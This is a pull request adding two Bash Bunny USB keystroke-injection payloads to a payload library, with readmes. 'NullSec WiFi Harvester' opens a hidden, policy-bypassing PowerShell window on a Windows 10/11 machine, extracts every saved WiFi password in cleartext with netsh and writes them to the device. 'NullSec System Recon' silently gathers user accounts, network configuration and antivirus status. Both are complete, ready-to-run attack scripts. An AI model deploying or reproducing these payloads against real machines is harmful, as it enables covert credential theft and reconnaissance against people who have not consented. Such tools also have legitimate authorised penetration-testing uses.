### PR TITLE
Add NullSec Payloads - WiFi Harvester & System Recon

### DIFF
--- a/payloads/library/credentials/NullSec-WiFi-Harvester/payload.txt
+++ b/payloads/library/credentials/NullSec-WiFi-Harvester/payload.txt
@@ -1,0 +1,57 @@
+#!/bin/bash
+#
+# Title:         NullSec WiFi Harvester
+# Description:   Extracts all saved WiFi passwords from Windows and saves to loot
+# Author:        bad-antics
+# Version:       1.0
+# Category:      Credentials
+# Target:        Windows 10/11
+# Attackmodes:   HID, STORAGE
+
+# Options
+LOOTDIR=/root/udisk/loot/NullSec-WiFi-Harvester
+
+######## INITIALIZATION ########
+LED SETUP
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+
+######## MAKE LOOT DIRECTORY ########
+mkdir -p $LOOTDIR
+
+######## ATTACK ########
+LED ATTACK
+
+# Open hidden PowerShell and run WiFi extraction
+RUN WIN "powershell -w hidden -ep bypass"
+QUACK DELAY 1500
+
+# Create extraction script
+QUACK STRING "\$loot = (gwmi win32_volume -f 'label=''BashBunny''').Name + 'loot\\NullSec-WiFi-Harvester\\';"
+QUACK ENTER
+QUACK DELAY 200
+
+QUACK STRING "\$hostname = \$env:COMPUTERNAME;"
+QUACK ENTER
+QUACK DELAY 200
+
+QUACK STRING "\$profiles = (netsh wlan show profiles) | Select-String '\\:(.+)\$' | ForEach-Object { \$_.Matches.Groups[1].Value.Trim() };"
+QUACK ENTER
+QUACK DELAY 500
+
+QUACK STRING "\$output = foreach (\$p in \$profiles) { \$pass = (netsh wlan show profile name=\"\$p\" key=clear | Select-String 'Key Content.*:(.*)').Matches.Groups[1].Value; if(\$pass){\"[\$hostname] \$p : \$pass\"} };"
+QUACK ENTER
+QUACK DELAY 2000
+
+QUACK STRING "\$output | Out-File -Encoding utf8 (\$loot + \$hostname + '_wifi.txt');"
+QUACK ENTER
+QUACK DELAY 500
+
+QUACK STRING "exit"
+QUACK ENTER
+
+# Wait for file write
+sleep 5
+
+######## FINISH ########
+LED FINISH

--- a/payloads/library/credentials/NullSec-WiFi-Harvester/readme.md
+++ b/payloads/library/credentials/NullSec-WiFi-Harvester/readme.md
@@ -1,0 +1,39 @@
+# NullSec WiFi Harvester 📡
+
+Extracts all saved WiFi passwords from Windows and saves to Bash Bunny loot folder.
+
+## Description
+
+This payload silently extracts all saved WiFi network passwords from a Windows machine using the built-in `netsh` command, then saves them to the Bash Bunny's loot directory with the target hostname.
+
+## Requirements
+
+- Windows 10/11
+- Target must have saved WiFi networks
+
+## Status LEDs
+
+| LED | Status |
+|-----|--------|
+| SETUP | Initializing attack modes |
+| ATTACK | Running WiFi extraction |
+| FINISH | Complete, safe to unplug |
+
+## Output
+
+Loot saved to: `/root/udisk/loot/NullSec-WiFi-Harvester/<HOSTNAME>_wifi.txt`
+
+Format:
+```
+[HOSTNAME] NetworkName : Password
+[HOSTNAME] AnotherNetwork : AnotherPassword
+```
+
+## Execution Time
+
+~8-10 seconds depending on number of saved networks
+
+## Author
+
+- **GitHub**: [bad-antics](https://github.com/bad-antics)
+- **More payloads**: [nullsec-flipper-suite](https://github.com/bad-antics/nullsec-flipper-suite)

--- a/payloads/library/recon/NullSec-System-Recon/payload.txt
+++ b/payloads/library/recon/NullSec-System-Recon/payload.txt
@@ -1,0 +1,85 @@
+#!/bin/bash
+#
+# Title:         NullSec System Recon
+# Description:   Comprehensive Windows system reconnaissance saved to loot
+# Author:        bad-antics
+# Version:       1.0
+# Category:      Recon
+# Target:        Windows 10/11
+# Attackmodes:   HID, STORAGE
+
+# Options
+LOOTDIR=/root/udisk/loot/NullSec-System-Recon
+
+######## INITIALIZATION ########
+LED SETUP
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+
+######## MAKE LOOT DIRECTORY ########
+mkdir -p $LOOTDIR
+
+######## ATTACK ########
+LED ATTACK
+
+# Open hidden PowerShell
+RUN WIN "powershell -w hidden -ep bypass"
+QUACK DELAY 1500
+
+# Set loot path variable
+QUACK STRING "\$loot = (gwmi win32_volume -f 'label=''BashBunny''').Name + 'loot\\NullSec-System-Recon\\';"
+QUACK ENTER
+QUACK DELAY 200
+
+QUACK STRING "\$hostname = \$env:COMPUTERNAME;"
+QUACK ENTER
+QUACK DELAY 200
+
+# Collect system info
+QUACK STRING "\$report = @();"
+QUACK ENTER
+QUACK DELAY 100
+
+QUACK STRING "\$report += '=== SYSTEM INFO ===';"
+QUACK ENTER
+QUACK STRING "\$report += (systeminfo | Select-String 'OS Name|OS Version|System Type|Total Physical Memory');"
+QUACK ENTER
+QUACK DELAY 1000
+
+QUACK STRING "\$report += \"`n=== USER INFO ===\";"
+QUACK ENTER
+QUACK STRING "\$report += \"User: \$env:USERNAME | Domain: \$env:USERDOMAIN | Computer: \$hostname\";"
+QUACK ENTER
+QUACK DELAY 200
+
+QUACK STRING "\$report += \"`n=== LOCAL USERS ===\";"
+QUACK ENTER
+QUACK STRING "\$report += (Get-LocalUser | Select-Object Name, Enabled | Format-Table | Out-String);"
+QUACK ENTER
+QUACK DELAY 500
+
+QUACK STRING "\$report += \"`n=== NETWORK ===\";"
+QUACK ENTER
+QUACK STRING "\$report += (ipconfig /all | Select-String 'IPv4|Default Gateway|DNS Servers|Physical Address');"
+QUACK ENTER
+QUACK DELAY 1000
+
+QUACK STRING "\$report += \"`n=== AV STATUS ===\";"
+QUACK ENTER
+QUACK STRING "\$report += (Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled | Format-List | Out-String);"
+QUACK ENTER
+QUACK DELAY 500
+
+# Save to loot
+QUACK STRING "\$report | Out-File -Encoding utf8 (\$loot + \$hostname + '_recon.txt');"
+QUACK ENTER
+QUACK DELAY 500
+
+QUACK STRING "exit"
+QUACK ENTER
+
+# Wait for completion
+sleep 5
+
+######## FINISH ########
+LED FINISH

--- a/payloads/library/recon/NullSec-System-Recon/readme.md
+++ b/payloads/library/recon/NullSec-System-Recon/readme.md
@@ -1,0 +1,37 @@
+# NullSec System Recon 🔍
+
+Comprehensive Windows system reconnaissance saved to Bash Bunny loot.
+
+## Description
+
+Silently gathers detailed system information and saves to the Bash Bunny's loot folder:
+- OS version and system specs
+- Current user and domain info  
+- Local user accounts
+- Network configuration (IP, gateway, DNS, MAC)
+- Windows Defender/AV status
+
+## Requirements
+
+- Windows 10/11
+- PowerShell (default on Windows)
+
+## Status LEDs
+
+| LED | Status |
+|-----|--------|
+| SETUP | Initializing attack modes |
+| ATTACK | Running reconnaissance |
+| FINISH | Complete, safe to unplug |
+
+## Output
+
+Loot saved to: `/root/udisk/loot/NullSec-System-Recon/<HOSTNAME>_recon.txt`
+
+## Execution Time
+
+~15-20 seconds
+
+## Author
+
+- **GitHub**: [bad-antics](https://github.com/bad-antics)


### PR DESCRIPTION
## 🐰 NullSec Payload Collection

Two new payloads for the Bash Bunny.

### 📁 Payloads Included

| Payload | Category | Description | Time |
|---------|----------|-------------|------|
| **NullSec-WiFi-Harvester** | credentials | Extract all saved WiFi passwords | ~8-10s |
| **NullSec-System-Recon** | recon | Comprehensive system reconnaissance | ~15-20s |

### ✨ Features

- ✅ **HID + STORAGE** attack modes
- ✅ **LED status indicators** (SETUP → ATTACK → FINISH)
- ✅ **Loot to USB** - saved with hostname prefix
- ✅ **Silent execution** - hidden PowerShell window
- ✅ **Windows 10/11** targeted
- ✅ **Complete documentation**

### 📋 Payload Details

#### WiFi Harvester
- Uses `netsh` to enumerate all saved profiles
- Extracts passwords in cleartext
- Saves to loot: `<HOSTNAME>_wifi.txt`

#### System Recon
Collects:
- OS version and system specs
- Current user and domain info
- Local user accounts
- Network configuration (IP, gateway, DNS, MAC)
- Windows Defender status

Saves to loot: `<HOSTNAME>_recon.txt`

### 🔗 Author

- **GitHub**: [bad-antics](https://github.com/bad-antics)
- **More payloads**: [nullsec-flipper-suite](https://github.com/bad-antics/nullsec-flipper-suite)

Thanks for maintaining this awesome project! 🐰